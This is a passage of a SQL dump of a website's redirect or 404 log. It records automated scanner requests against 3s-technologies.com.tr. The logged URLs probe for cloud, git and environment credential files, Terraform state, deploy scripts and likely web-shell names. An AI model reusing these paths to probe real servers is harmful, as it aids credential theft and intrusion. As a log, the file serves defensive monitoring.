00:00:00',301),(62859,'https://www.3s-technologies.com.tr/en/setup-config.php',NULL,'','',1,0,'2026-04-12 10:47:15','0000-00-00 00:00:00',301),(62860,'https://www.3s-technologies.com.tr/en/configuration.bak',NULL,'','',1,0,'2026-04-12 10:47:16','0000-00-00 00:00:00',301),(62861,'https://www.3s-technologies.com.tr/en/app_dev.php',NULL,'','',1,0,'2026-04-12 10:47:16','0000-00-00 00:00:00',301),(62862,'https://www.3s-technologies.com.tr/en/config_dev.php',NULL,'','',1,0,'2026-04-12 10:47:17','0000-00-00 00:00:00',301),(62863,'https://www.3s-technologies.com.tr/en/index-dev.php',NULL,'','',1,0,'2026-04-12 10:47:17','0000-00-00 00:00:00',301),(62864,'https://www.3s-technologies.com.tr/en/index-test.php',NULL,'','',1,0,'2026-04-12 10:47:18','0000-00-00 00:00:00',301),(62865,'https://www.3s-technologies.com.tr/en/test/index.php',NULL,'','',1,0,'2026-04-12 10:47:18','0000-00-00 00:00:00',301),(62866,'https://www.3s-technologies.com.tr/en/dev/index.php',NULL,'','',1,0,'2026-04-12 10:47:19','0000-00-00 00:00:00',301),(62867,'https://www.3s-technologies.com.tr/en/dev/config.php',NULL,'','',1,0,'2026-04-12 10:47:19','0000-00-00 00:00:00',301),(62868,'https://www.3s-technologies.com.tr/en/maintenance.php',NULL,'','',1,0,'2026-04-12 10:47:20','0000-00-00 00:00:00',301),(62869,'https://www.3s-technologies.com.tr/en/maintenance.html',NULL,'','',1,0,'2026-04-12 10:47:20','0000-00-00 00:00:00',301),(62870,'https://www.3s-technologies.com.tr/en/under-construction.html',NULL,'','',1,0,'2026-04-12 10:47:21','0000-00-00 00:00:00',301),(62871,'https://www.3s-technologies.com.tr/en/down.html',NULL,'','',1,0,'2026-04-12 10:47:22','0000-00-00 00:00:00',301),(62872,'https://www.3s-technologies.com.tr/en/.maintenance',NULL,'','',1,0,'2026-04-12 10:47:22','0000-00-00 00:00:00',301),(62873,'https://www.3s-technologies.com.tr/en/install/install.php',NULL,'','',1,0,'2026-04-12 10:47:23','0000-00-00 00:00:00',301),(62874,'https://www.3s-technologies.com.tr/en/setup/setup.php',NULL,'','',1,0,'2026-04-12 10:47:23','0000-00-00 00:00:00',301),(62875,'https://www.3s-technologies.com.tr/en/setup/index.php',NULL,'','',1,0,'2026-04-12 10:47:24','0000-00-00 00:00:00',301),(62876,'https://www.3s-technologies.com.tr/en/upgrade.php',NULL,'','',1,0,'2026-04-12 10:47:24','0000-00-00 00:00:00',301),(62877,'https://www.3s-technologies.com.tr/en/upgrade/index.php',NULL,'','',1,0,'2026-04-12 10:47:25','0000-00-00 00:00:00',301),(62878,'https://www.3s-technologies.com.tr/en/upgrader.php',NULL,'','',1,0,'2026-04-12 10:47:25','0000-00-00 00:00:00',301),(62879,'https://www.3s-technologies.com.tr/en/migrate.php',NULL,'','',1,0,'2026-04-12 10:47:26','0000-00-00 00:00:00',301),(62880,'https://www.3s-technologies.com.tr/en/migration.php',NULL,'','',1,0,'2026-04-12 10:47:26','0000-00-00 00:00:00',301),(62881,'https://www.3s-technologies.com.tr/en/console.php',NULL,'','',1,0,'2026-04-12 10:47:27','0000-00-00 00:00:00',301),(62882,'https://www.3s-technologies.com.tr/en/scripts/install.sh',NULL,'','',1,0,'2026-04-12 10:47:27','0000-00-00 00:00:00',301),(62883,'https://www.3s-technologies.com.tr/en/scripts/db.sh',NULL,'','',1,0,'2026-04-12 10:47:28','0000-00-00 00:00:00',301),(62884,'https://www.3s-technologies.com.tr/en/scripts/deploy.sh',NULL,'','',1,0,'2026-04-12 10:47:28','0000-00-00 00:00:00',301),(62885,'https://www.3s-technologies.com.tr/en/env.sh',NULL,'','',1,0,'2026-04-12 10:47:29','0000-00-00 00:00:00',301),(62886,'https://www.3s-technologies.com.tr/en/.env.sh',NULL,'','',1,0,'2026-04-12 10:47:29','0000-00-00 00:00:00',301),(62887,'https://www.3s-technologies.com.tr/en/backup.sh',NULL,'','',1,0,'2026-04-12 10:47:30','0000-00-00 00:00:00',301),(62888,'https://www.3s-technologies.com.tr/en/test.sh',NULL,'','',1,0,'2026-04-12 10:47:30','0000-00-00 00:00:00',301),(62889,'https://www.3s-technologies.com.tr/en/debug.sh',NULL,'','',1,0,'2026-04-12 10:47:31','0000-00-00 00:00:00',301),(62890,'https://www.3s-technologies.com.tr/en/logs.sh',NULL,'','',1,0,'2026-04-12 10:47:31','0000-00-00 00:00:00',301),(62891,'https://www.3s-technologies.com.tr/en/deploy.sh',NULL,'','',1,0,'2026-04-12 10:47:31','0000-00-00 00:00:00',301),(62892,'https://www.3s-technologies.com.tr/en/init.sh',NULL,'','',1,0,'2026-04-12 10:47:32','0000-00-00 00:00:00',301),(62893,'https://www.3s-technologies.com.tr/en/install.sh',NULL,'','',1,0,'2026-04-12 10:47:33','0000-00-00 00:00:00',301),(62894,'https://www.3s-technologies.com.tr/en/uninstall.sh',NULL,'','',1,0,'2026-04-12 10:47:33','0000-00-00 00:00:00',301),(62895,'https://www.3s-technologies.com.tr/en/remove.sh',NULL,'','',1,0,'2026-04-12 10:47:33','0000-00-00 00:00:00',301),(62896,'https://www.3s-technologies.com.tr/en/install.sql',NULL,'','',1,0,'2026-04-12 10:47:34','0000-00-00 00:00:00',301),(62897,'https://www.3s-technologies.com.tr/en/update.sql',NULL,'','',1,0,'2026-04-12 10:47:34','0000-00-00 00:00:00',301),(62898,'https://www.3s-technologies.com.tr/en/delete.sql',NULL,'','',1,0,'2026-04-12 10:47:35','0000-00-00 00:00:00',301),(62899,'https://www.3s-technologies.com.tr/en/sample.env',NULL,'','',1,0,'2026-04-12 10:47:35','0000-00-00 00:00:00',301),(62900,'https://www.3s-technologies.com.tr/en/example.env',NULL,'','',1,0,'2026-04-12 10:47:36','0000-00-00 00:00:00',301),(62901,'https://www.3s-technologies.com.tr/en/example-config.php',NULL,'','',1,0,'2026-04-12 10:47:36','0000-00-00 00:00:00',301),(62902,'https://www.3s-technologies.com.tr/en/sample-config.php',NULL,'','',1,0,'2026-04-12 10:47:37','0000-00-00 00:00:00',301),(62903,'https://www.3s-technologies.com.tr/en/var/task/next.config.js',NULL,'','',1,0,'2026-04-12 10:47:37','0000-00-00 00:00:00',301),(62904,'https://www.3s-technologies.com.tr/en/var/task/next.config.mjs',NULL,'','',1,0,'2026-04-12 10:47:38','0000-00-00 00:00:00',301),(62905,'https://www.3s-technologies.com.tr/en/var/task/next.config.ts',NULL,'','',1,0,'2026-04-12 10:47:38','0000-00-00 00:00:00',301),(62906,'https://www.3s-technologies.com.tr/en/app/next.config.js',NULL,'','',1,0,'2026-04-12 10:47:39','0000-00-00 00:00:00',301),(62907,'https://www.3s-technologies.com.tr/en/app/next.config.mjs',NULL,'','',1,0,'2026-04-12 10:47:39','0000-00-00 00:00:00',301),(62908,'https://www.3s-technologies.com.tr/en/$(pwd)/next.config.js',NULL,'','',1,0,'2026-04-12 10:47:40','0000-00-00 00:00:00',301),(62909,'https://www.3s-technologies.com.tr/en/$(pwd)/next.config.mjs',NULL,'','',1,0,'2026-04-12 10:47:41','0000-00-00 00:00:00',301),(62910,'https://www.3s-technologies.com.tr/en/var/task/nuxt.config.js',NULL,'','',1,0,'2026-04-12 10:47:41','0000-00-00 00:00:00',301),(62911,'https://www.3s-technologies.com.tr/en/var/task/nuxt.config.ts',NULL,'','',1,0,'2026-04-12 10:47:42','0000-00-00 00:00:00',301),(62912,'https://www.3s-technologies.com.tr/en/app/nuxt.config.js',NULL,'','',1,0,'2026-04-12 10:47:42','0000-00-00 00:00:00',301),(62913,'https://www.3s-technologies.com.tr/en/var/task/serverless.yml',NULL,'','',1,0,'2026-04-12 10:47:43','0000-00-00 00:00:00',301),(62914,'https://www.3s-technologies.com.tr/en/var/task/serverless.yaml',NULL,'','',1,0,'2026-04-12 10:47:43','0000-00-00 00:00:00',301),(62915,'https://www.3s-technologies.com.tr/en/var/task/serverless.json',NULL,'','',1,0,'2026-04-12 10:47:44','0000-00-00 00:00:00',301),(62916,'https://www.3s-technologies.com.tr/en/app/serverless.yml',NULL,'','',1,0,'2026-04-12 10:47:44','0000-00-00 00:00:00',301),(62917,'https://www.3s-technologies.com.tr/en/app/serverless.yaml',NULL,'','',1,0,'2026-04-12 10:47:45','0000-00-00 00:00:00',301),(62918,'https://www.3s-technologies.com.tr/en/$(pwd)/serverless.yml',NULL,'','',1,0,'2026-04-12 10:47:45','0000-00-00 00:00:00',301),(62919,'https://www.3s-technologies.com.tr/en/$(pwd)/serverless.yaml',NULL,'','',1,0,'2026-04-12 10:47:46','0000-00-00 00:00:00',301),(62920,'https://www.3s-technologies.com.tr/en/var/task/package.json',NULL,'','',1,0,'2026-04-12 10:47:46','0000-00-00 00:00:00',301),(62921,'https://www.3s-technologies.com.tr/en/app/package.json',NULL,'','',1,0,'2026-04-12 10:47:47','0000-00-00 00:00:00',301),(62922,'https://www.3s-technologies.com.tr/en/$(pwd)/package.json',NULL,'','',1,0,'2026-04-12 10:47:47','0000-00-00 00:00:00',301),(62923,'https://www.3s-technologies.com.tr/en/var/task/vercel.json',NULL,'','',1,0,'2026-04-12 10:47:48','0000-00-00 00:00:00',301),(62924,'https://www.3s-technologies.com.tr/en/app/vercel.json',NULL,'','',1,0,'2026-04-12 10:47:48','0000-00-00 00:00:00',301),(62925,'https://www.3s-technologies.com.tr/en/$(pwd)/vercel.json',NULL,'','',1,0,'2026-04-12 10:47:49','0000-00-00 00:00:00',301),(62926,'https://www.3s-technologies.com.tr/en/var/task/netlify.toml',NULL,'','',1,0,'2026-04-12 10:47:50','0000-00-00 00:00:00',301),(62927,'https://www.3s-technologies.com.tr/en/app/netlify.toml',NULL,'','',1,0,'2026-04-12 10:47:50','0000-00-00 00:00:00',301),(62928,'https://www.3s-technologies.com.tr/en/$(pwd)/netlify.toml',NULL,'','',1,0,'2026-04-12 10:47:51','0000-00-00 00:00:00',301),(62929,'https://www.3s-technologies.com.tr/en/var/task/docker-compose.yml',NULL,'','',1,0,'2026-04-12 10:47:51','0000-00-00 00:00:00',301),(62930,'https://www.3s-technologies.com.tr/en/var/task/docker-compose.yaml',NULL,'','',1,0,'2026-04-12 10:47:51','0000-00-00 00:00:00',301),(62931,'https://www.3s-technologies.com.tr/en/app/docker-compose.yml',NULL,'','',1,0,'2026-04-12 10:47:52','0000-00-00 00:00:00',301),(62932,'https://www.3s-technologies.com.tr/en/$(pwd)/docker-compose.yml',NULL,'','',1,0,'2026-04-12 10:47:52','0000-00-00 00:00:00',301),(62933,'https://www.3s-technologies.com.tr/en/docker/overlay/config.json',NULL,'','',1,0,'2026-04-12 10:47:53','0000-00-00 00:00:00',301),(62934,'https://www.3s-technologies.com.tr/en/opt/mailcow-dockerized/mailcow.conf',NULL,'','',1,0,'2026-04-12 10:47:54','0000-00-00 00:00:00',301),(62935,'https://www.3s-technologies.com.tr/en/docker/registry/config.yml',NULL,'','',1,0,'2026-04-12 10:47:54','0000-00-00 00:00:00',301),(62936,'https://www.3s-technologies.com.tr/en/.docker/secrets.json',NULL,'','',1,0,'2026-04-12 10:47:55','0000-00-00 00:00:00',301),(62937,'https://www.3s-technologies.com.tr/en/attacker/docker-compose.yml',NULL,'','',1,0,'2026-04-12 10:47:55','0000-00-00 00:00:00',301),(62938,'https://www.3s-technologies.com.tr/en/_vercel/insights',NULL,'','',1,0,'2026-04-12 10:47:56','0000-00-00 00:00:00',301),(62939,'https://www.3s-technologies.com.tr/en/aws/bucket',NULL,'','',1,0,'2026-04-12 10:47:56','0000-00-00 00:00:00',301),(62940,'https://www.3s-technologies.com.tr/en/aws/buckets',NULL,'','',1,0,'2026-04-12 10:47:57','0000-00-00 00:00:00',301),(62941,'https://www.3s-technologies.com.tr/en/aws/config/s3.json',NULL,'','',1,0,'2026-04-12 10:47:57','0000-00-00 00:00:00',301),(62942,'https://www.3s-technologies.com.tr/en/aws/s3/credentials',NULL,'','',1,0,'2026-04-12 10:47:58','0000-00-00 00:00:00',301),(62943,'https://www.3s-technologies.com.tr/en/aws/s3/env.env',NULL,'','',1,0,'2026-04-12 10:47:58','0000-00-00 00:00:00',301),(62944,'https://www.3s-technologies.com.tr/en/aws_s3_bucket',NULL,'','',1,0,'2026-04-12 10:47:59','0000-00-00 00:00:00',301),(62945,'https://www.3s-technologies.com.tr/en/aws_s3_config.json',NULL,'','',1,0,'2026-04-12 10:47:59','0000-00-00 00:00:00',301),(62946,'https://www.3s-technologies.com.tr/en/s3/.aws/config',NULL,'','',1,0,'2026-04-12 10:48:00','0000-00-00 00:00:00',301),(62947,'https://www.3s-technologies.com.tr/en/config/aws.php',NULL,'','',1,0,'2026-04-12 10:48:00','0000-00-00 00:00:00',301),(62948,'https://www.3s-technologies.com.tr/en/aws-codecommit',NULL,'','',1,0,'2026-04-12 10:48:01','0000-00-00 00:00:00',301),(62949,'https://www.3s-technologies.com.tr/en/aws.yaml',NULL,'','',1,0,'2026-04-12 10:48:01','0000-00-00 00:00:00',301),(62950,'https://www.3s-technologies.com.tr/en/old/aws_config',NULL,'','',1,0,'2026-04-12 10:48:02','0000-00-00 00:00:00',301),(62951,'https://www.3s-technologies.com.tr/en/aws.env.json',NULL,'','',1,0,'2026-04-12 10:48:02','0000-00-00 00:00:00',301),(62952,'https://www.3s-technologies.com.tr/en/aws.env',NULL,'','',1,0,'2026-04-12 10:48:03','0000-00-00 00:00:00',301),(62953,'https://www.3s-technologies.com.tr/en/aws-ses.json',NULL,'','',1,0,'2026-04-12 10:48:03','0000-00-00 00:00:00',301),(62954,'https://www.3s-technologies.com.tr/en/aws/ses/smtp.env',NULL,'','',1,0,'2026-04-12 10:48:04','0000-00-00 00:00:00',301),(62955,'https://www.3s-technologies.com.tr/en/aws/metadata',NULL,'','',1,0,'2026-04-12 10:48:05','0000-00-00 00:00:00',301),(62956,'https://www.3s-technologies.com.tr/en/.env.aws',NULL,'','',1,0,'2026-04-12 10:48:05','0000-00-00 00:00:00',301),(62957,'https://www.3s-technologies.com.tr/en/s3/credentials',NULL,'','',1,0,'2026-04-12 10:48:06','0000-00-00 00:00:00',301),(62958,'https://www.3s-technologies.com.tr/en/s3/bucket.env',NULL,'','',1,0,'2026-04-12 10:48:06','0000-00-00 00:00:00',301),(62959,'https://www.3s-technologies.com.tr/en/s3/bucket',NULL,'','',1,0,'2026-04-12 10:48:07','0000-00-00 00:00:00',301),(62960,'https://www.3s-technologies.com.tr/en/s3/buckets',NULL,'','',1,0,'2026-04-12 10:48:07','0000-00-00 00:00:00',301),(62961,'https://www.3s-technologies.com.tr/en/s3/backup',NULL,'','',1,0,'2026-04-12 10:48:08','0000-00-00 00:00:00',301),(62962,'https://www.3s-technologies.com.tr/en/s3.yml',NULL,'','',1,0,'2026-04-12 10:48:08','0000-00-00 00:00:00',301),(62963,'https://www.3s-technologies.com.tr/en/s3.yaml',NULL,'','',1,0,'2026-04-12 10:48:09','0000-00-00 00:00:00',301),(62964,'https://www.3s-technologies.com.tr/en/s3.properties',NULL,'','',1,0,'2026-04-12 10:48:09','0000-00-00 00:00:00',301),(62965,'https://www.3s-technologies.com.tr/en/s3.key',NULL,'','',1,0,'2026-04-12 10:48:10','0000-00-00 00:00:00',301),(62966,'https://www.3s-technologies.com.tr/en/s3.secret',NULL,'','',1,0,'2026-04-12 10:48:10','0000-00-00 00:00:00',301),(62967,'https://www.3s-technologies.com.tr/en/s3/.env.bak',NULL,'','',1,0,'2026-04-12 10:48:11','0000-00-00 00:00:00',301),(62968,'https://www.3s-technologies.com.tr/en/root/.aws/config',NULL,'','',1,0,'2026-04-12 10:48:11','0000-00-00 00:00:00',301),(62969,'https://www.3s-technologies.com.tr/en/home/*/.aws/credentials',NULL,'','',1,0,'2026-04-12 10:48:13','0000-00-00 00:00:00',301),(62970,'https://www.3s-technologies.com.tr/en/root/.boto',NULL,'','',1,0,'2026-04-12 10:48:14','0000-00-00 00:00:00',301),(62971,'https://www.3s-technologies.com.tr/en/.s3cfg',NULL,'','',1,0,'2026-04-12 10:48:15','0000-00-00 00:00:00',301),(62972,'https://www.3s-technologies.com.tr/en/root/.s3cfg',NULL,'','',1,0,'2026-04-12 10:48:15','0000-00-00 00:00:00',301),(62973,'https://www.3s-technologies.com.tr/en/etc/boto.cfg',NULL,'','',1,0,'2026-04-12 10:48:16','0000-00-00 00:00:00',301),(62974,'https://www.3s-technologies.com.tr/en/.terraform/credentials.tfrc.json',NULL,'','',1,0,'2026-04-12 10:48:16','0000-00-00 00:00:00',301),(62975,'https://www.3s-technologies.com.tr/en/terraform.tfstate',NULL,'','',1,0,'2026-04-12 10:48:17','0000-00-00 00:00:00',301),(62976,'https://www.3s-technologies.com.tr/en/terraform.tfstate.backup',NULL,'','',1,0,'2026-04-12 10:48:18','0000-00-00 00:00:00',301),(62977,'https://www.3s-technologies.com.tr/en/.terraform.tfstate',NULL,'','',1,0,'2026-04-12 10:48:18','0000-00-00 00:00:00',301),(62978,'https://www.3s-technologies.com.tr/en/serverless.yaml',NULL,'','',1,0,'2026-04-12 10:48:19','0000-00-00 00:00:00',301),(62979,'https://www.3s-technologies.com.tr/en/sam-template.yaml',NULL,'','',1,0,'2026-04-12 10:48:19','0000-00-00 00:00:00',301),(62980,'https://www.3s-technologies.com.tr/en/template.yaml',NULL,'','',1,0,'2026-04-12 10:48:20','0000-00-00 00:00:00',301),(62981,'https://www.3s-technologies.com.tr/en/amplify/team-provider-info.json',NULL,'','',1,0,'2026-04-12 10:48:20','0000-00-00 00:00:00',301),(62982,'https://www.3s-technologies.com.tr/en/.amplifyrc',NULL,'','',1,0,'2026-04-12 10:48:21','0000-00-00 00:00:00',301),(62983,'https://www.3s-technologies.com.tr/en/$(pwd)/terraform.tfstate',NULL,'','',1,0,'2026-04-12 10:48:22','0000-00-00 00:00:00',301),(62984,'https://www.3s-technologies.com.tr/en/$(pwd)/.terraform/terraform.tfstate',NULL,'','',1,0,'2026-04-12 10:48:22','0000-00-00 00:00:00',301),(62985,'https://www.3s-technologies.com.tr/en/$(pwd)/terraform.tfvars',NULL,'','',1,0,'2026-04-12 10:48:23','0000-00-00 00:00:00',301),(62986,'https://www.3s-technologies.com.tr/en/$(pwd)/*.auto.tfvars',NULL,'','',1,0,'2026-04-12 10:48:23','0000-00-00 00:00:00',301),(62987,'https://www.3s-technologies.com.tr/en/app/terraform.tfstate',NULL,'','',1,0,'2026-04-12 10:48:24','0000-00-00 00:00:00',301),(62988,'https://www.3s-technologies.com.tr/en/app/.terraform/terraform.tfstate',NULL,'','',1,0,'2026-04-12 10:48:24','0000-00-00 00:00:00',301),(62989,'https://www.3s-technologies.com.tr/en/~/.aws/credentials',NULL,'','',1,0,'2026-04-12 10:48:25','0000-00-00 00:00:00',301),(62990,'https://www.3s-technologies.com.tr/en/~/.aws/config',NULL,'','',1,0,'2026-04-12 10:48:25','0000-00-00 00:00:00',301),(62991,'https://www.3s-technologies.com.tr/en/~/.boto',NULL,'','',1,0,'2026-04-12 10:48:26','0000-00-00 00:00:00',301),(62992,'https://www.3s-technologies.com.tr/en/~/.s3cfg',NULL,'','',1,0,'2026-04-12 10:48:26','0000-00-00 00:00:00',301),(62993,'https://www.3s-technologies.com.tr/en/.terraform.lock.hcl',NULL,'','',1,0,'2026-04-12 10:48:27','0000-00-00 00:00:00',301),(62994,'https://www.3s-technologies.com.tr/en/terraform.tfvars',NULL,'','',1,0,'2026-04-12 10:48:28','0000-00-00 00:00:00',301),(62995,'https://www.3s-technologies.com.tr/en/terraform/terraform.tfvars.json',NULL,'','',1,0,'2026-04-12 10:48:28','0000-00-00 00:00:00',301),(62996,'https://www.3s-technologies.com.tr/en/var/task/amplify.yml',NULL,'','',1,0,'2026-04-12 10:48:29','0000-00-00 00:00:00',301),(62997,'https://www.3s-technologies.com.tr/en/var/task/amplify.yaml',NULL,'','',1,0,'2026-04-12 10:48:29','0000-00-00 00:00:00',301),(62998,'https://www.3s-technologies.com.tr/en/app/amplify.yml',NULL,'','',1,0,'2026-04-12 10:48:30','0000-00-00 00:00:00',301),(62999,'https://www.3s-technologies.com.tr/en/app/amplify.yaml',NULL,'','',1,0,'2026-04-12 10:48:30','0000-00-00 00:00:00',301),(63000,'https://www.3s-technologies.com.tr/en/var/task/amplify/backend/function/*/src/index.js',NULL,'','',1,0,'2026-04-12 10:48:31','0000-00-00 00:00:00',301),(63001,'https://www.3s-technologies.com.tr/en/$(pwd)/.env',NULL,'','',1,0,'2026-04-12 10:48:32','0000-00-00 00:00:00',301),(63002,'https://www.3s-technologies.com.tr/en/$(pwd)/.env.local',NULL,'','',1,0,'2026-04-12 10:48:32','0000-00-00 00:00:00',301),(63003,'https://www.3s-technologies.com.tr/en/$(pwd)/.env.production',NULL,'','',1,0,'2026-04-12 10:48:33','0000-00-00 00:00:00',301),(63004,'https://www.3s-technologies.com.tr/en/$(pwd)/.env.development',NULL,'','',1,0,'2026-04-12 10:48:33','0000-00-00 00:00:00',301),(63005,'https://www.3s-technologies.com.tr/en/$(pwd)/.env.staging',NULL,'','',1,0,'2026-04-12 10:48:34','0000-00-00 00:00:00',301),(63006,'https://www.3s-technologies.com.tr/en/app/.env.local',NULL,'','',1,0,'2026-04-12 10:48:34','0000-00-00 00:00:00',301),(63007,'https://www.3s-technologies.com.tr/en/app/.env.production',NULL,'','',1,0,'2026-04-12 10:48:35','0000-00-00 00:00:00',301),(63008,'https://www.3s-technologies.com.tr/en/var/www/.env',NULL,'','',1,0,'2026-04-12 10:48:35','0000-00-00 00:00:00',301),(63009,'https://www.3s-technologies.com.tr/en/var/www/html/.env',NULL,'','',1,0,'2026-04-12 10:48:36','0000-00-00 00:00:00',301),(63010,'https://www.3s-technologies.com.tr/en/opt/.env',NULL,'','',1,0,'2026-04-12 10:48:36','0000-00-00 00:00:00',301),(63011,'https://www.3s-technologies.com.tr/en/srv/.env',NULL,'','',1,0,'2026-04-12 10:48:37','0000-00-00 00:00:00',301),(63012,'https://www.3s-technologies.com.tr/en/.github',NULL,'','',1,0,'2026-04-12 10:48:39','0000-00-00 00:00:00',301),(63013,'https://www.3s-technologies.com.tr/en/.github/workflows',NULL,'','',1,0,'2026-04-12 10:48:39','0000-00-00 00:00:00',301),(63014,'https://www.3s-technologies.com.tr/en/.github/workflows/main.yml',NULL,'','',1,0,'2026-04-12 10:48:40','0000-00-00 00:00:00',301),(63015,'https://www.3s-technologies.com.tr/en/.github/workflows/ci.yml',NULL,'','',1,0,'2026-04-12 10:48:40','0000-00-00 00:00:00',301),(63016,'https://www.3s-technologies.com.tr/en/.github/dependabot.yml',NULL,'','',1,0,'2026-04-12 10:48:41','0000-00-00 00:00:00',301),(63017,'https://www.3s-technologies.com.tr/en/.github/codeowners',NULL,'','',1,0,'2026-04-12 10:48:41','0000-00-00 00:00:00',301),(63018,'https://www.3s-technologies.com.tr/en/.github/issue_template',NULL,'','',1,0,'2026-04-12 10:48:42','0000-00-00 00:00:00',301),(63019,'https://www.3s-technologies.com.tr/en/.github/pull_request_template.md',NULL,'','',1,0,'2026-04-12 10:48:42','0000-00-00 00:00:00',301),(63020,'https://www.3s-technologies.com.tr/en/.github/funding.yml',NULL,'','',1,0,'2026-04-12 10:48:43','0000-00-00 00:00:00',301),(63021,'https://www.3s-technologies.com.tr/en/.github/stale.yml',NULL,'','',1,0,'2026-04-12 10:48:43','0000-00-00 00:00:00',301),(63022,'https://www.3s-technologies.com.tr/en/.gitlab',NULL,'','',1,0,'2026-04-12 10:48:44','0000-00-00 00:00:00',301),(63023,'https://www.3s-technologies.com.tr/en/.gitlab/issue_templates',NULL,'','',1,0,'2026-04-12 10:48:44','0000-00-00 00:00:00',301),(63024,'https://www.3s-technologies.com.tr/en/.gitlab/merge_request_templates',NULL,'','',1,0,'2026-04-12 10:48:45','0000-00-00 00:00:00',301),(63025,'https://www.3s-technologies.com.tr/en/.gitlab-ci',NULL,'','',1,0,'2026-04-12 10:48:45','0000-00-00 00:00:00',301),(63026,'https://www.3s-technologies.com.tr/en/.gitattributes',NULL,'','',1,0,'2026-04-12 10:48:46','0000-00-00 00:00:00',301),(63027,'https://www.3s-technologies.com.tr/en/.gitmodules',NULL,'','',1,0,'2026-04-12 10:48:46','0000-00-00 00:00:00',301),(63028,'https://www.3s-technologies.com.tr/en/.git-credentials',NULL,'','',1,0,'2026-04-12 10:48:47','0000-00-00 00:00:00',301),(63029,'https://www.3s-technologies.com.tr/en/.git-askpass.sh',NULL,'','',1,0,'2026-04-12 10:48:47','0000-00-00 00:00:00',301),(63030,'https://www.3s-technologies.com.tr/en/.git-secret',NULL,'','',1,0,'2026-04-12 10:48:48','0000-00-00 00:00:00',301),(63031,'https://www.3s-technologies.com.tr/en/root/.git-credentials',NULL,'','',1,0,'2026-04-12 10:48:49','0000-00-00 00:00:00',301),(63032,'https://www.3s-technologies.com.tr/en/root/.gitconfig',NULL,'','',1,0,'2026-04-12 10:48:49','0000-00-00 00:00:00',301),(63033,'https://www.3s-technologies.com.tr/en/root/.netrc',NULL,'','',1,0,'2026-04-12 10:48:50','0000-00-00 00:00:00',301),(63034,'https://www.3s-technologies.com.tr/en/home/*/.git-credentials',NULL,'','',1,0,'2026-04-12 10:48:50','0000-00-00 00:00:00',301),(63035,'https://www.3s-technologies.com.tr/en/home/*/.gitconfig',NULL,'','',1,0,'2026-04-12 10:48:51','0000-00-00 00:00:00',301),(63036,'https://www.3s-technologies.com.tr/en/home/*/.netrc',NULL,'','',1,0,'2026-04-12 10:48:51','0000-00-00 00:00:00',301),(63037,'https://www.3s-technologies.com.tr/en/~/.git-credentials',NULL,'','',1,0,'2026-04-12 10:48:52','0000-00-00 00:00:00',301),(63038,'https://www.3s-technologies.com.tr/en/~/.gitconfig',NULL,'','',1,0,'2026-04-12 10:48:52','0000-00-00 00:00:00',301),(63039,'https://www.3s-technologies.com.tr/en/~/.netrc',NULL,'','',1,0,'2026-04-12 10:48:53','0000-00-00 00:00:00',301),(63040,'https://www.3s-technologies.com.tr/en/wp-content/plugins',NULL,'','',1,0,'2026-04-12 10:48:54','0000-00-00 00:00:00',301),(63041,'https://www.3s-technologies.com.tr/en/wp-json/wp/v2/users',NULL,'','',1,0,'2026-04-12 10:48:54','0000-00-00 00:00:00',301),(63042,'https://www.3s-technologies.com.tr/en/etc/apache2/apache2.conf',NULL,'','',1,0,'2026-04-12 10:48:55','0000-00-00 00:00:00',301),(63043,'https://3s-technologies.com.tr/_next',NULL,'','',1,0,'2026-04-12 10:48:56','0000-00-00 00:00:00',301),(63044,'https://3s-technologies.com.tr/api/auth/callback',NULL,'','',1,0,'2026-04-12 10:48:57','0000-00-00 00:00:00',301),(63045,'https://3s-technologies.com.tr/api/auth/session',NULL,'','',1,0,'2026-04-12 10:48:58','0000-00-00 00:00:00',301),(63046,'https://3s-technologies.com.tr/_rsc',NULL,'','',1,0,'2026-04-12 10:48:58','0000-00-00 00:00:00',301),(63047,'https://3s-technologies.com.tr/__rsc',NULL,'','',1,0,'2026-04-12 10:48:58','0000-00-00 00:00:00',301),(63048,'https://3s-technologies.com.tr/.action',NULL,'','',1,0,'2026-04-12 10:48:59','0000-00-00 00:00:00',301),(63049,'https://3s-technologies.com.tr/__nextjs_action',NULL,'','',1,0,'2026-04-12 10:48:59','0000-00-00 00:00:00',301),(63050,'https://3s-technologies.com.tr/_middleware',NULL,'','',1,0,'2026-04-12 10:49:00','0000-00-00 00:00:00',301),(63051,'https://3s-technologies.com.tr/_next/image',NULL,'','',1,0,'2026-04-12 10:49:00','0000-00-00 00:00:00',301),(63052,'https://3s-technologies.com.tr/rsc/409qee3wbg6tg9o.txt',NULL,'','',1,0,'2026-04-12 10:49:00','0000-00-00 00:00:00',301),(63053,'http://mail.3s-technologies.com.tr/tr/mifta.php',NULL,'','',8,0,'2026-04-12 14:58:34','0000-00-00 00:00:00',301),(63054,'http://mail.3s-technologies.com.tr/tr/son1.php',NULL,'','',9,0,'2026-04-12 14:58:36','0000-00-00 00:00:00',301),(63055,'http://mail.3s-technologies.com.tr/tr/tiny',NULL,'','',4,0,'2026-04-12 14:58:45','0000-00-00 00:00:00',301),(63056,'http://mail.3s-technologies.com.tr/tr/aios-bootstrap.php',NULL,'','',4,0,'2026-04-12 14:59:03','0000-00-00 00:00:00',301),(63057,'http://mail.3s-technologies.com.tr/tr/gz.php',NULL,'','',6,0,'2026-04-12 14:59:03','0000-00-00 00:00:00',301),(63058,'http://mail.3s-technologies.com.tr/tr/areak1.php',NULL,'','',6,0,'2026-04-12 14:59:04','0000-00-00 00:00:00',301),(63059,'http://mail.3s-technologies.com.tr/tr/wp-kz.php',NULL,'','',11,0,'2026-04-12 14:59:08','0000-00-00 00:00:00',301),(63060,'http://mail.3s-technologies.com.tr/tr/wp-lo.php',NULL,'','',3,0,'2026-04-12 14:59:09','0000-00-00 00:00:00',301),(63061,'http://mail.3s-technologies.com.tr/tr/fone1.php',NULL,'','',17,0,'2026-04-12 14:59:09','0000-00-00 00:00:00',301),(63062,'http://mail.3s-technologies.com.tr/tr/ipv6.php',NULL,'','',3,0,'2026-04-12 14:59:10','0000-00-00 00:00:00',301),(63063,'http://mail.3s-technologies.com.tr/tr/xper.php',NULL,'','',3,0,'2026-04-12 14:59:13','0000-00-00 00:00:00',301),(63064,'http://mail.3s-technologies.com.tr/tr/wxpass.php',NULL,'','',3,0,'2026-04-12 14:59:13','0000-00-00 00:00:00',301),(63065,'http://mail.3s-technologies.com.tr/tr/wp-block.php',NULL,'','',12,0,'2026-04-12 14:59:18','0000-00-00 00:00:00',301),(63066,'http://mail.3s-technologies.com.tr/tr/wp-includes/wincust.php',NULL,'','',3,0,'2026-04-12 14:59:18','0000-00-00 00:00:00',301),(63067,'http://mail.3s-technologies.com.tr/tr/xltt.php',NULL,'','',17,0,'2026-04-12 